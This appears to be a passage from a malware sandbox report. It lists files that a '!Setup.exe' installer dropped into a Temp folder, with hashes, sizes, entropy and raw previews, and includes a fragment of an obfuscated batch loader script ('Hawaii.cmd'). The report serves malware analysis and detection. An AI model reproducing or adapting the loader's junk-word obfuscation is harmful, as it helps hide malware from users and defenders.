SHA1:	6AE6AB7B82027625C1EBCA90E7A6B25CE311AF6C
SHA-256:	29E407582879AD9626EBB42EE74C999E2E9560F2508D8ACF7D8BF8071990F989
SHA-512:	597158A27869BCD58C68DADFED5D46A8ADDE6028AEDCC4F7BBD750374B908795B2519E6855787048BA603A7D81D0767D94D9B52CB080A9B2054169FBBB914303
Malicious:	false
Preview:	...........l.....p.....t.....x.....\|...........................f.............................................................._......^[.U..SV..j.[.F.9F.u0...j.X;.sF3.F...W.......Q......~....Y.......~._S.....Y.M......V..N.....F.^[]......U..QQ.}..........L)M....tv.}.........@)M.3.VW.}.B....U..0...E............}..t .M.......~L........E.j.P.FL......E....u..E ...u..~8...q....._^....3....FP..FT..U...u...(M..K...P.....j.j.j..u...x.I.]...U..Q.@)M.V.u.Wj.....8W.z...............d)M.j.Z.U.;........T)M.....0.........F.;G.u{............8......../.....................VW......~d...(....~h...0....~D...8....~P...@....>.t..6..<.I..&..u........d)M..U.B.U.;..._....u... .........$.........@)M........t.Q.=.....@)M..... ..5.)M..E.N.5.)M.;.L)M.u...L)M....D)M.........._..^u..5.)M.j.....I..%.)M....D)M...t..@)M..D...8.u..<)M...........U..E.VW.@......P......u..........>3._.F.....^]...U......`.D$.V.u.WP.D$.PV..............L$..@)M..T$..L$........T)M..L$.....8.\|$..............'........P............H......

C:\Users\user\AppData\Local\Temp\Automatically

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	141312
Entropy (8bit):	6.620562014970588
Encrypted:	false
SSDEEP:	3072:9Pnj0nEoXnmowS2u5hVOoQ7t8T6pUkBJR8CThpmESv+AqVnByE:9Pj0nEo3tb2j6AUkB0CThp6vmVnL
MD5:	4AB67943DB008805C76817CEEE5E1A12
SHA1:	8FBE0E080884B1261D392D17A292D7CD1F47D903
SHA-256:	F6B107C0987052DA8F7A65FB3780C8FDAD89A559E1CD5FADE4007921699850C6
SHA-512:	9C0635D5F3D83FEF4497DABD7D116546F54A258536424258DB9E7FE00F6108FA897A40226BC9288DE24D9C9512FB461D7CE8CA7F154564A84B031B51D178C5A2
Malicious:	false
Preview:	F.h.F...F...F...F...F.A.F.d.F.!.F.U....SV.u...M.....S....p.I.VS....I..E.P..p.I.^..[....V..V..l.I..f....f..^.V..V..p.I..f...f..^.U.......SV.u...L$..I...S....p.I.VS....I..D$.P..p.I.^[..]...U...0SV.u.W.~....Q..............E.PSj...X.I.....2...3....~*.E...AQ.M...\|....$..........M..D...M.;.\|.E......f.H..E..@......u...T.I..........E.P..l.I..E..}.P.u..}..}.}..E.......P.I...x\|.]..M.V....u......j.....#u...f......p..H..M..~'.<..t..4..M.......E.PS....I..M.G...;.\|..u...L.I..u..M.......E.P..p.I....1.u...H.I..u.....I..M.......E.P..p.I....u.....I.3._^[....U..M....V..#..Pj.j...\.I.....t;.u..e...M..y....M..#..PQ.M..,#..YP.F.P.\.......M..a.......3.^....U..V..W.f...~..f.......EL..F..........;}.t..u....Z..._.F.......^]...U..V..f...N..f.....EL..F..........E..F....F.....^]...U..V..f...N....EL..F........j..`...Y.u.........F....F.....^]...U..V..f...N....EL..F......M...j......Y.u....i....F....F.....^]...V.......j.V.....YY..^...V..N....EL...t.Q......N...t...j....N......j(V....YY..^...U..

C:\Users\user\AppData\Local\Temp\Banks

Download File

Process:	C:\Users\user\Desktop\!Setup.exe
File Type:	data
Category:	dropped
Size (bytes):	68608
Entropy (8bit):	7.99744491329809
Encrypted:	true
SSDEEP:	1536:0mDQ76snWyjbMmAeya/8yPgWj5Qwl4Y8kouwGLwaH7u:27VbbM/W/8MgClxouuaH7u
MD5:	199CD3F8C5B60C7265F23409A96BE623
SHA1:	FB0CA97902469430048B125260EB5602C399F3EB
SHA-256:	7EB320CAB6E73CC970AF8AD1411377149A0B0C3D0341CFCF615038A7C767C34A
SHA-512:	FAC7127C77ED5FF4E0B4FF074968E8CDC29D2A810133549DE571F70D65295095D595F09CF6943BC309DA7E1D23413DEFBD6D8258E682074763E75A5FC06FB207
Malicious:	false
Preview:	.r...6-..N.I1T....!...d..zz.....3...... ..$..f...h.....M...IpZ.x+4.l.P-J.....D.d.3R....t...>.....^.....\<...C.s...%.UU.R.k:..g.E.Y.....`q..]...#.e..^.....T\|..u..p_,..>%^.x.!..!..D.w...-......R......F6.....ai.......(..Y].Y......j\|..<..y...1Zr.......V...b....F..&..4q.6Q...a.nN..+5X...&.....o.Q.p?7......CH. ..,Q..X.Ox....[.E.{.D..yE..g.g=.[..a...D.M..-........-....sg-..Z.%2Z...0...V..{[(>.:-..tZ.7Aq....m$..8...Nhu..@..D...t&.O..,.h.....V...;..@........Y......>!z.y...kk:.w.m.a2.wOS.AVq.."{..a...C.z...q...Y.hA.k..s(Z...+.F..71..Q....?S.vp(.......Lz7.'u.L..v[../4.g..RyXNS.Ame...\|G.....?...m...~...TA.:....b..c04.Y..:.[.. .......".W..<C.r._..^"BJ.Bb1P?.`....p...K...-JTd..D..X.J5....{!.:h,..D.-.Q..4~Q.f55Et...E.q.....C.'.$By".Lv.&;....%...6G..b......dk!./!.<J.........t..(./.'3U.H.nm.$...B.....dA..:CK. .b7T.A.......6.....>.y..P....K.%.Uf.'0.'.....r.....7..Y.may.b.8....si..@..[.?..V*j.....U.......2.,k......v..M.~hV/.J.....k.....@k.'.!...20}...

C:\Users\user\AppData\Local\Temp\Breaking

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	103424
Entropy (8bit):	5.1671928796069295
Encrypted:	false
SSDEEP:	768:0x/SGKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVSQsbZgar3R:0dKaj6iTcPAsAhxjgarB
MD5:	30BD144613749651F4A5C979D8F712CC
SHA1:	F55E5F0754C30073C7520EAECD4BB1DA35F51576
SHA-256:	DA775E9426B4F982BD6BE1EFF75B6730B22373A4B57F6138D9D2CA201B6F828F
SHA-512:	7ACCD3AE6C36889ED45055A6FF79B2B9B4F88B687163E11FB5174577800D616381A707BED4115FA093B8A45A482E4946196C6E266201CCA7C1F47ECD7B6CCD70
Malicious:	false
Preview:	.!.!.!.!.!.!. . .r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.".".r.".r.r.".".r.".r.r.".r.r.r.r.r.r.".".".".r.".".".".".".".r.".".".r.".r.".r.r.".".r.".".".".#.".$.#.#.#.#.#.#.r.#.#.".r.r.".".".".".r.%.r.#.#.#.#.#.#.r.r.&.&.&.&.&.&.&.&.&.&.r.r.".".".".r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.'.(.(.(.).).).).).).).).).).).).).).).(.).(.(.(...(.(.(.(.(.(.+.+.+.+.+.+.+.+.+.+.,.,.,.,.,.,.,.,.,.,.(..(..(..-...-..././.'.'.'.'.'.'.'.'.r.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.r.r.r.r.............../......)...'.'.'.'.'............r.....................................r.(.(.(.(.(.(.(.(..(.(.(.(.(.(.r.(.(.).).).).).........).).r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1.1.2.2.2.2.3.2.2.2.2.2.2.1.2.2.3.3.2.2.0.4.4.4.4.4.4.4.4

C:\Users\user\AppData\Local\Temp\Convenient

Download File

Process:	C:\Users\user\Desktop\!Setup.exe
File Type:	data
Category:	dropped
Size (bytes):	54272
Entropy (8bit):	7.996412126820582
Encrypted:	true
SSDEEP:	1536:uMwHtV4mgih70mtszrjqY3QzIr5ATkFig7m1:uMwNV4Zih7xt+ez/X20
MD5:	1F599459E44BE5B32AAD1DFB0425C415
SHA1:	67AC20926B1BD5DAD01AC115D776E6673594BAC9
SHA-256:	C3983929F781198CFCC42F7FEE310D40B0039FFD61A6AD577FE7BC0952D622C8
SHA-512:	440404763EF2FA3B12477823067EF80AB814338A616251A6361954B90B349F83417CE52ECD609D27C03FCCD88986DAEAE8F25A9C6FA6793B812AD6296AAB8099
Malicious:	false
Preview:	L.}...4.....[.....^..&.b....K.U2.......s.FSyUjb.ZJS.5.}"'....@../i..p..O....A....?.x..4.^I..u..@.. ...5.?F....."J".H{......V..)._%...].v.......9..G.Y.....=....y..\|..;...N.5.!.......e..\.p....T..7..].SP..G.^.n.h!UCa.q...6.\|..78.0!.....x..;.HB...R..........@..5.....\$.T.=....~qM.^.....&......X....].3.R...D.=..R.0.y'.D.J[$E.J-d..`U!'\|4.I....>....#wI#G....-I..@h.q............%.S%.b....UM-E........o..>u.TX..9h...I.x.....{..fa.lj.c....u.\|..LL.....7.biC.....r....t.......(...s..qPO.@......Y^.QT..{.s.....0.3.[.....ov..1%.;)...yO3..$71t.........p}x..R.{{?....d....p...V0....ZcYp.fm.u...(.>'.N.....8..b.G.......W/..R...96..j......Z#V.Si.(..b&\@.z3..U.`..E..[...M.......O..u....&U.h.$."o.(.@&~..4.iaV..Kc..Q.y....W...%]..NI.9U5.f....:A@..BJ..\.?....8.....p$...D..DO}.+..;I...&T..I...t.8....f....ZF.Ls......-....7.D..MF...E...D.......o7%...$.nxw..?..c.7...'.t.P......K-.Y..(.......JT.._'=...Q...0EQZ>:...i....,.8..3..`~....T........... .......C.V.2

C:\Users\user\AppData\Local\Temp\Directors

Download File

Process:	C:\Users\user\Desktop\!Setup.exe
File Type:	data
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	7.997222519619146
Encrypted:	true
SSDEEP:	1536:Fg8iemeADtlL7xKlVU2piqZTFyjLaMETMR2tVBpbWMdhASM:akpEtLMpiEiNBR2R9/dh1M
MD5:	5AB2E75E18F2B1AA53E04FA983939D08
SHA1:	2C46E8C5925534A350C0795E0606BB1B9ED07B5C
SHA-256:	C8CB59D4F9B1112C81889F11D088D1C3CB6ACD40BBBF994C2F25BB4F1B8A1F31
SHA-512:	9FD8193A5D490225E3F2AFD5584F15DF1765E2F3502D51913F1BAA70DAB390B4B3B33FAC8FF018267B6A938358DA6FC5B0D71590C62F2F430CB6E15409CEF75C
Malicious:	false
Preview:	.O.la^.T..~...q...mNY..N8\..q.u....I./...S...:.*W....!.xm.(.B.<..z.eas.p.M.H.\|..i.X.......[x...W]4...U.J../.+=.).4Xp...Xi(U.G.%..........g...d.O...Z..L\|......8\|.....0....b.\....z.>E.8V....@...P......6[.. ].?xknH>E.<kl.......>...V....."x6......A..h?S.GPdV..C../...`5[...6].Yi..0.3#...Z....gr..\...)..(NL.%\.........6.~....C...y.Q....XN.4C.....J....Jh......dD......e./.,.}.J.2....(.D..........\..2K..:.H...i..T%..l.0...s0 2~.@.H.....P...3..R.+{....[....1.b.l.Nb ....O...}. !.....+..z.2.RF_.F].v1...oE..9...vm_..".3Un]/.^J%7.......c.t`Zq:.B..J~....w......g.+R ....ke4..."?..X.....N<<X..x.r...".e.."H.+}.kO../..v/aOW.....>...n.%...C.....(.lB..'..].s..Q.jW.S..f..83i......lF;.z.....bHet.)z\}.'......Y...../E3.c.........#_\|.f..H.....s.Lm...4(.Wg#..&.{..q7~:~......L...._e......f..o_...$...3...7\|;.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y

C:\Users\user\AppData\Local\Temp\Documentary

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	124928
Entropy (8bit):	6.436187263272638
Encrypted:	false
SSDEEP:	3072:wWoUlJUPdgQa8Bp/LxyA3laW2UDQWf05mjccBiqXvpgF4qv+3g:EgQaE/loUDtf0accB3gBmQ
MD5:	9EF1B9C4B396A8FB44D0BECB2644A44C
SHA1:	6C84926EF6A4D22DC3ED82474E5CBE0DD21E8A95
SHA-256:	35258C552DDA8579E54936A86407B06E833939893BED2605AA5409F7C50113B9
SHA-512:	DCD42F55D241F1FCACFCB64214C1B4D3BE6D4861401E07AAD0AF380AD13E6198EC150B8C081BC98E4BAC955F9B20EB6EC8373406A197A99284F544A0F53AA47A
Malicious:	false
Preview:	.....D$H.t$p.K..L$t...L$@..t..Q..T$l;.v...D$l.\|$l......1v+....D$\.....L$x...f;.u..........u.D$H.L$@9D$lr..2.D$xf9D$\s'.L$@..L$t.C.....3M..C....3M..{.........L$h.Y....3M..L$h.Y....3M..K....D$,P.D$PP..........V...D$U.L$P.D$..L$ .....D$xf9D$\.....D$H.S..K..L$D.........r.;........\|$p.2.D$@.?..t-....D$\.....L$x...f;.u........l$@.u.D$H.L$D;B.r....D$xf9D$\s#.L$D..C.....3M..C....3M..{.........L$`.Y....3M..L$`.Y....3M.._....\|$9...D...j.............h..M..F...........D$..F...D$..D$4.w....\|$9....S....$.....y....\|$..I.._..w...../....G......Q...j.W.G............N..........u.\|$..T$ .......L....=..M..........N...F....F..8....N..j.V......C.....C...........D$H........................u..A.............2....D$..D$U.....\|$9.......j............h..M..F...........D$...F..T$..T$4.c....\|$9....P.....s....I..........B..8.t~....6.....8....T...D$,P.D$PP.>.......@T...T$P.L$U.T$ ..t..D....@...f..H...I..f..O...I...u..A..............u..A...............t..r.j.R..........T$ .T$P.\|$T....Q.....\|$LO.D$

C:\Users\user\AppData\Local\Temp\Gain

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	125952
Entropy (8bit):	6.6951716365509295
Encrypted:	false
SSDEEP:	3072:ZeOyKODOSpQSAU4CE0Imbi80PtCZEMnVIPPBxa:ZLsiS+SAhClbfSCOMVIPPS
MD5:	A95AD4F969EE6943F117C5BE230575BB
SHA1:	0158436FB5922A1C804B0B2FD2BA562D6CAA7F8C
SHA-256:	8DCF893EAA91E245786A9D54B4018381DB2DF45D30359D1327725B5D955901E8
SHA-512:	8912A1F483C3848C718C7B903DFEDDD83FDCF42C81E3B3CE64697C7A8922DC0A327EEEF0937BCA9A268C165F34FABB572224D8CCD9EAD89AE843D4EDAE3F185B
Malicious:	false
Preview:	.........?k.03..U.}......M..E.M..\|.).t..E......E..H..M..u..E..U........+H.S...M.V....E....E....D.(.......j.WW.u..W......;E.u@;U.u;.E..}.P....+H.;P.....#.t..H..9.u......A.E.9U.u.@.......kW.u..u..u......#......;.u.....;..+.....\|.;.w .E..@......t..E..@......u.......E..@......M.E......M..D.(.t.......u..u.SV.'....u......u..u..u......+....E..U.^[_..]..U.............L.3.E.S.u.....Y.M...y..u..E..U..S.....+A.VWj..j.RP.-...........?........k.0...j......M..t9$.t9 S.........M.......................;T9 ......;D9$......j.......Ph..........P.t9.....I.........j..u..u.S......................................\|..{9.....ws......3.........3.9.....u...t<;.s8..<.u..G.;.s..A..8.u........... .L........A;.....u.;.u......+......................_^.M.3.[.F.....]..U..].A.....U..]......U..M.3.;...#J.t'@..-r.A...w.j.X]..D...j.Y;...#....]....#J.]..U..V......M.Q......Y........0^]..0;....u....L.......;....u....L.........=0#M..tn.....\$..D$.%....=....u..<$f..$f...f....d$.uA.=.....=0

C:\Users\user\AppData\Local\Temp\Hawaii

Download File

Process:	C:\Users\user\Desktop\!Setup.exe
File Type:	ASCII text, with very long lines (446), with CRLF line terminators
Category:	dropped
Size (bytes):	9100
Entropy (8bit):	5.1216310176022795
Encrypted:	false
SSDEEP:	192:p5Yv+ynrINgAt9exZgj6jH96+ORsevryr3sFnAWCaWYgnSXL9/:I1nrsgofcdNOCOr0sXCJTnSXx
MD5:	09B309C1A2264392B322C92EF41392DE
SHA1:	1A2A95AD55990B96841614F81785EC85EC4E318F
SHA-256:	D528B2EE891A908FCF1824B78E54D882F1F417F45D839478B84650C8C5A5B31F
SHA-512:	B91109E4936B1148D1F1957FFCAFA20A67306BBB7042B585218218060476A439A0C13EB9CCAB360D62DADE7B6534EB62EAFFD7AEE1383E4547A721EEFB030750
Malicious:	false
Preview:	Set Food= ..tLKcCamcorder-Whale-Mas-Companion-..daKWatts-..dOPoint-Airline-Flow-..fXKmFactory-Upload-Halfcom-Members-Software-Issue-Suspected-Sp-Its-..xgRecognized-Orchestra-Exotic-Dish-Trembl-Applying-Eternal-Sudden-..Set Mit=I..ddZdRoughly-Boot-Insertion-Vocabulary-Using-Ballet-Typing-Forces-Pursue-..dBVSSub-Addiction-Charges-Patches-Exchanges-..kIProphet-Laura-Bills-Opposite-Demonstrated-Decide-..bdKWGamma-Side-Listen-Was-Skilled-Provisions-..oKFDictionary-..YdFlickr-Accident-..DvPhWildlife-Environmental-Brochure-Jefferson-..SllWJulie-Construct-Outer-Popular-Lancaster-Hospitals-Neighbors-Larry-Variable-..Set Inter=c..CcNationally-Visit-Aw-Trusts-Trek-River-Ferry-Commitments-..mGJHeaven-Presently-Garden-Transexuales-Mountains-Battlefield-Truly-Triangle-Aid-..QGHEmployer-Imagination-Pointing-Purchased-Atom-Based-..EniXAccount-Themselves-..phqnMail-Computers-Mac-Rate-Nova-..mUDDimensional-Entirely-Dude-Cold-..MUMins-Nfl-Bigger-Slide-Customer-Declared-Walker-Houston-..wYEmerald-Senegal-

C:\Users\user\AppData\Local\Temp\Hawaii.cmd (copy)

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (446), with CRLF line terminators
Category:	dropped
Size (bytes):	9100
Entropy (8bit):	5.1216310176022795
Encrypted:	false
SSDEEP:	192:p5Yv+ynrINgAt9exZgj6jH96+ORsevryr3sFnAWCaWYgnSXL9/:I1nrsgofcdNOCOr0sXCJTnSXx
MD5:	09B309C1A2264392B322C92EF41392DE
SHA1:	1A2A95AD55990B96841614F81785EC85EC4E318F
SHA-256:	D528B2EE891A908FCF1824B78E54D882F1F417F45D839478B84650C8C5A5B31F
SHA-512:	B91109E4936B1148D1F1957FFCAFA20A67306BBB7042B585218218060476A439A0C13EB9CCAB360D62DADE7B6534EB62EAFFD7AEE1383E4547A721EEFB030750
Malicious:	false
Preview:	Set Food= ..tLKcCamcorder-Whale-Mas-Companion-..daKWatts-..dOPoint-Airline-Flow-..fXKmFactory-Upload-Halfcom-Members-Software-Issue-Suspected-Sp-Its-..xgRecognized-Orchestra-Exotic-Dish-Trembl-Applying-Eternal-Sudden-..Set Mit=I..ddZdRoughly-Boot-Insertion-Vocabulary-Using-Ballet-Typing-Forces-Pursue-..dBVSSub-Addiction-Charges-Patches-Exchanges-..kIProphet-Laura-Bills-Opposite-Demonstrated-Decide-..bdKWGamma-Side-Listen-Was-Skilled-Provisions-..oKFDictionary-..YdFlickr-Accident-..DvPhWildlife-Environmental-Brochure-Jefferson-..SllWJulie-Construct-Outer-Popular-Lancaster-Hospitals-Neighbors-Larry-Variable-..Set Inter=c..CcNationally-Visit-Aw-Trusts-Trek-River-Ferry-Commitments-..mGJHeaven-Presently-Garden-Transexuales-Mountains-Battlefield-Truly-Triangle-Aid-..QGHEmployer-Imagination-Pointing-Purchased-Atom-Based-..EniXAccount-Themselves-..phqnMail-Computers-Mac-Rate-Nova-..mUDDimensional-Entirely-Dude-Cold-..MUMins-Nfl-Bigger-Slide-Customer-Declared-Walker-Houston-..wYEmerald-Senegal-

C:\Users\user\AppData\Local\Temp\Identifier

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	74752
Entropy (8bit):	6.666685648618068
Encrypted:	false
SSDEEP:	1536:Qu6/sPYcSyRXzW8/uC6LdTmHwANUQlHS3cctlxWboHdMJ3RraSXL20:c/sZydTmRxlHS3NxrHSBRt3
MD5:	CAE61584B1282ADC156A49D4C821E445
SHA1:	852A2741737BBAAAB47EF2C8E5CB04A27CC93555
SHA-256:	E63D0DF4C817E5AD62DEF35B27E79626EA293F1D197F8075BAF1B5CF652A57BD
SHA-512:	4D4FDCD86A470BB2300B26D3DA24E9F008D4DFCD1D1867D5F90DADAAE278BF1DC50378DC92A57F1630FAD139C79C98143B9FDADD0D73B7B357D58F9A488DDB7E
Malicious:	false
Preview:	........;M.......;~\|..'......=....w&tV=....w.tM...tH.. tC....=....t7....=_ ..w t)=. ........=. ..v.=/ ..t..x...=.0....m......A.}.;M.\|..\...;M...S...;~\|.........=....w...:......r....w..+...=( ..r.=) ...........A.}.;M.\|......;M.......;~\|..N......=....w.t.......v.......................A.}.;M.\|.....;M.......;~\|..........E.....f;E.w...FD...........M.A....}..M.;M.\|..v...;M...m...;~\|..............f;...S.....FD......D....E...@.}..E.;E.\|..-...;M...$...;~\|..s.......E.....f;E.w...FD...........M.A....}..M.;M.\|......;M.......;~\|..+...........f;.........FD...........E...@.}..E.;E.\|.....;M.......;~\|..........E.....f;E.w...FD....uo.M.A....}..M.;M.\|..[;M.}V;~\|s,........f;.wD..FD....t9.E...@.}..E.;E.\|..%.......t.;.....v..Fh..................}........;........E...@..P.u.V.u..u..F...............E.....}...}.u.;.v.f.?.u.f....u.....}.;.u......U.....................p....E.@f.;zP.u.VQ.u.uZ.}..S....................M.......f;............f;........E...@..P.u.V.u..u.........O.....}....x......=...

C:\Users\user\AppData\Local\Temp\Mainland

Download File

Process:	C:\Users\user\Desktop\!Setup.exe
File Type:	OpenPGP Public Key
Category:	dropped
Size (bytes):	66560
Entropy (8bit):	7.997108957439442
Encrypted:	true
SSDEEP:	1536:NVx6/Cr1sajqu7n7Gnj7zk5H9b7sNvyNhYUdzS5jx39NEueVHTz4hUZj:NVx6sDjqCoj7zwCNaHYUdzS559Z6zEm
MD5:	1F9EB7E32FBABB8033ECA33AE50EC6D0
SHA1:	5CED495F0A239DD8FDD751B8E5BCD6B25F0EABE1
SHA-256:	02F9C31922DADB9EE86908A6BB1820A3E31FD6307800E9EC656431724E542582
SHA-512:	79C3EBDCB8B4B2316038644CBB1164433FF19980554E1462D00B2FDA030B84493D7F76001B02C7A58E5C22E4979467868A494B64DCB8E7E55851862C206DF834
Malicious:	false
Preview:	.I....&G...C...o.....;~......u.....PO...2n...B..s.U...\.R]g. .4b...Ger....P..g...}...us`.t.w.......'QU....f.:.Y...B..s.fo....\|..)3j...J.._z.i.8.Y....jw...d...;I...S.......$.t..#.YI.$..?.F..p .G..v.P....Y.t..q.:...ck.M.1.......}..l...W..0Y....x....<(..eLQY.'..P.^x-.~...h. .5.....D.:.i..T.}..Cx,...}u....t..(.+..w.&4..[...S...3..k.e.S.r..^R....8;.....A3.....'.^......U.f..3VY.{........P{...T.}.x.;.d.Q......hE7 2..H..VR..6...WA..f\s.....R..M......Dc.....O....q.....JO.pD)c.._{..).!.]hp..YI ..9.8..\.......<7#4..qS...jo......E..7.Y..!H.Ouv... b,H..?.<GW\...B.>n.....7.v\|..G.q..$..^%J.O..K.0...jg...r....[..Y..f.E3..L..].5-.k.........K...M].gb~.}....?.\|^...xt ....M:.A..Z...q<A.K<yT.l..@...hEUw?Qe......=zy...>...)WEI.B..(..}L.s...5./i.w..RI:./........8...r...}...c.0J.2.-.c.....<..M...<.s_.C..2.#s.U.1.\|?......V...9..........f.g.=....).r.*.w0..Irc...].jNa\|.f..g_...X.\[.....#..N.$1)......f..Q.Q..7..,.hD`.5j.Vx.h.eI~.L...q..Bi..6`.K...`.....{.vR.

C:\Users\user\AppData\Local\Temp\Mainstream

Download File

Process:	C:\Users\user\Desktop\!Setup.exe
File Type:	data
Category:	dropped
Size (bytes):	29984
Entropy (8bit):	7.993554019608367
Encrypted:	true
SSDEEP:	384:/QsoUaLIOPDXKdzpkIQ+e8ffOtKSNwyKIMvS0o2mGreBUUJ3XZVRI1YzhWR+Nz0H:41UiXsimBfsc/jmGSVXeaNIOY24
MD5:	BBD61428D503B8F0B4309ABF2B0A590A
SHA1:	CB7340D319D1BD22B98053282979B7842D57B01B
SHA-256:	1ACA393043CA5ACB6C8CDE778BDD12E4AF62D17DF9C417048FCFACFFA593EB4B
SHA-512:	FB09ED2DC17007EAE7996BBC1B3D4BC18CE53FD9E0A981BE796BE90B1CD35A2AC11207A36D009BD5C9FC5A3E82DD476F7044B72ABCE30D4E27EEA5BBF58EF385
Malicious:	false
Preview:	w.V..N..9..n..U.......k.4...2.VoK\|z....DP..3~CV..m..4.B.\'..z.....mJ.@d...n...........e....Q..F..C....!..yh.2..?.......~..K.G#r.7.F......=..fz.Bz..D?..u.+.v.'}4....TI.....??.......]..4m.M..A...l.It.L..@..C..... ....A............GD.k#.....L....S..z...u..a.. .6...a..Z.C.\ .....4.jT..-....0..z.......b.t.T.+..A..!..X..\|ML.$..W...I..!.d....7P]..K.p-G.....)P5.nkM.......!......{........b..(...!r...c.WL...>.._....C^...7...pV....]..._.N9h.....#....Z2s.c...1t...[}XC....R.....of<+kw..P..1orgjxb2\..w....'.e/S&.V.a..T..r6......\..!'.f...bH.p.Z..mH..r0'ii.yhD....@T..K...+4.._...V....LW#.'.c>....5.n.W;.D...M`.1..B.N.[...OJ.X2...f.u. ...\.t.....)+.....{...O6..u........)....j.......9j.../%].!...nn.t..2j.\|.i.,f+.&.....9.Z.H...m...8D..g..K..v3.uz.-.o.6..u.#..lh.......g.00N..-/]M......#...gpsQ..J..V.....!N}Oj{.m4..~.......,...8..*.;......,+...d.D.z...X.C.. ..re.Y{.X..b.[K.%..~...f..]...VRQ..a...F.&.~...c...a..I.1/.y....zoS^.3..:(...`.T...l}..

C:\Users\user\AppData\Local\Temp\Msg

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	123904
Entropy (8bit):	6.475963629841424
Encrypted:	false
SSDEEP:	3072:2Ibv18mLthfhnueoMmOqDoioO5bLezW9FfTut/Dde6u640ewy4Za9coRC2jfTJ:vphfhnvO5bLezWWt/Dd314V14ZgP0K
MD5:	E024BDE95A7431F63101238DC643C246
SHA1:	A5A50BF9EB444FD17BAB5F96FDA4F144F1D0D144
SHA-256:	5FE7CF708EDF32EBA42C57C87B351BA542CA9E5EFC1C4372F071095E2AAF11BC
SHA-512:	2C133476134F0A59EA80F9DE9A9EC823A200C2FC2FACDDA99066DEC32F18B72C9A25E1ADBB2C2244138C6806D48F0EF67FE216D6DDB63918CA94B105E55CAB63
Malicious:	false
Preview:	.....t.......=...t0.......#..C........H..\|9...D9.t..@8.@..........j.j.j.V............c...v.j.j.j..u..{.........^...PV.E...P.o.....u....Y.......C.........j.j.j..u..<................E..H..I........E..H..I..7...j..M.Qj.PRV....I..........C........u3.#...$.I....I..\|9...T9.t..R8.B..\|9...D9.t..@8.@.....3_^3.[....U..E..@....@.H...wp.$..,H....L..g...L..`...L..Y...L..R...L..K...L..D...L..=...L..6...L../...L..(. .L..!.0.L....@.L....T.L....p.L....$}L..M.P..?..3.]....,H..,H..,H.",H.),H.7,H.>,H.E,H.L,H.S,H.Z,H.0,H.a,H.h,H.o,H.U..E..M.:.r..E.:.w.....2.]...U..V..W.}..F.P...F.PR.......t-.F.P.F.P..G.P......t..F.P..G.VP......t.....2._^]...U......,SVW....4.I.P.D$.P............}..D$(.u..\|$..t$.P..D.I.P....I...y.O..y.N.G......\|$0.x..F..u......\|$4.X...u&VVSWh........I..}..t.j.Y....._^[..]...~...d~.j.^.D$ P....I.iD$ .....L$0I....L$4@.D$.iD$$....I...@.D$..D$...P.D$...Pj V.........t.j.j..t$..t$ h........I.j.Y.H.....U..QQ.E.3.M.BSV.u...E..E......W...3.....M..E.....]...;.s_.......F.....F..........

C:\Users\user\AppData\Local\Temp\Sensitive

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	77824
Entropy (8bit):	5.894156182333572
Encrypted:	false
SSDEEP:	1536:IR8anHsWccd0vtmgMbFuz08QuklMBNIimuzaAwusU:88QLeAg0Fuz08XvBNbjaAtsU
MD5:	11087B75AF9F289CF3EA0502CFD4237A
SHA1:	0B38A88B528828512E3EBDC1660439E474FF2618
SHA-256:	B18B50190B88ADEF9CFEBF22B2D2CB8B59E595CC6FFDD1BF1C53458DF2BCA66A
SHA-512:	5245B70DC06F1CF505BF683FD7830F9FB25B9A6181CAF1936EF00B39D56D5A05ABC2ED8BB60ABFDAD2842AD20FD3223CE18E83192442DBF191AD44036F9F3497
Malicious:	false
Preview:	s.m..r.......d'.c....%{..p..k.>._.......n...j..f2.9...EZ%..qVJ...........C..\|.!.@.....'..\|.%.I....@...T..aY..\..D..g...R...)..`......!.......V..G.6.K]._.....@....k#c..d8L2..W..BJ.a"..=.<.r..t.Y.....l..........[aOni{...P.+4./.'Pc.q...J.(...onI.n.....@2&@..Pr....)..[f..;..}.e.S.w.. .S...%.KM....-...."RP(.....W..B.}]9..Y..8.......w.za...ja.......g.V ..:.6...ip..ev ..&...g.n...+.2q.QH...ER.......x....t...].u.......r.eLK(w...m.CQ..'U...'...=....@J.....#..m.Xo..C.]-.H....Y..(...?....q..Di}.n...V.yu.....<u....?.k:.....FEMh......$...h0'D...A.....X.Qh.%v}.qN...d..Z...W.....f.) ....}m?..M...p..=A..N..q....:@O.?..owM&.......1U...X...&aV...j..uv.D,.G.A....>.......U...D..~ $s%r.......@b;zO]..3A.Omm.!.3V.V..%...(...w;I..-.G 8.........N..hU.]i..<.$qE}...A.'J.nW.b."..........f3...7>,......d..Nj.5.jVg...@.;xh.2k....id&....._....U. J..W......{.,Ji...)......v.6..U......K%.v......t..:..H.cY....i.&>r...["93.u.zK..G-w.n..@........_..l.%B.....s.\|...-C.iu+

